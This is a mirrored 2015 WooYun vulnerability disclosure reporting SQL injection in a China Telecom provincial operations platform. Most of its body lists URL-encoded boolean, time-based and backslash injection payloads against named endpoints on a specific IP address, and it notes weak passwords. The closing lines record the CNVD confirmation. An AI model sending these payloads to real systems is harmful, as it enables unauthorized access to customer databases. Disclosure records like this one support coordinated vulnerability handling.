乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-27: 细节已通知厂商并且等待厂商处理中 2015-03-04: 厂商已经确认,细节仅向厂商公开 2015-03-14: 细节向核心白帽子及相关领域专家公开 2015-03-24: 细节向普通白帽子公开 2015-04-03: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
恭喜发财,红包拿来
此前看了这个洞 WooYun: 中国电信某省联盟运营平台存在高危SQL注入涉及海量数据 测试了一下,已经修复,但总觉的应该还有些什么.....于是
http://218.30.22.96/manage/heyue/yz.php POST Submit=%e7%ab%8b%e5%8d%b3%e6%9f%a5%e8%af%a2&zhibiao=-1'%20OR%203*2*1%3d6%20AND%2000089%3d00089%20--%20
http://218.30.22.96/manage/iphone/yhlist.php POST Submit=%e7%ab%8b%e5%8d%b3%e6%90%9c%e7%b4%a2&key=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&state=1
http://218.30.22.96/manage/xuanhao/mylist.php POST Submit=%e7%ab%8b%e5%8d%b3%e6%90%9c%e7%b4%a2&endtime=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&key=1&startime=%e5%bc%80%e5%a7%8b%e6%97%b6%e9%97%b4&state=0&tgyzcode=94102
http://218.30.22.96/manage/yewu/iphone.php?endtime=&key=&page=1&startime=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&state=
http://218.30.22.96/reg/dopwdsave.php POST %e6%8f%90%e4%ba%a4=%e6%89%be%e5%9b%9e%e5%af%86%e7%a0%81&isyanzheng=0&username=%5c&verifycode=g00dPa%24%24w0rD
http://218.30.22.96/seachnetage/seach_save.php POST codetype=1&uname=%5c&utel=%e8%af%b7%e8%be%93%e5%85%a5%e6%82%a8%e7%9a%84%e8%ba%ab%e4%bb%bd%e8%af%81%e5%90%8e%e5%9b%9b%e4%bd%8d&yztype=1
密码基本上都是弱口令
你懂的
危害等级:高
漏洞Rank:11
确认时间:2015-03-04 09:08
CNVD确认所述情况,已转由CNCERT向中国电信通报。
暂无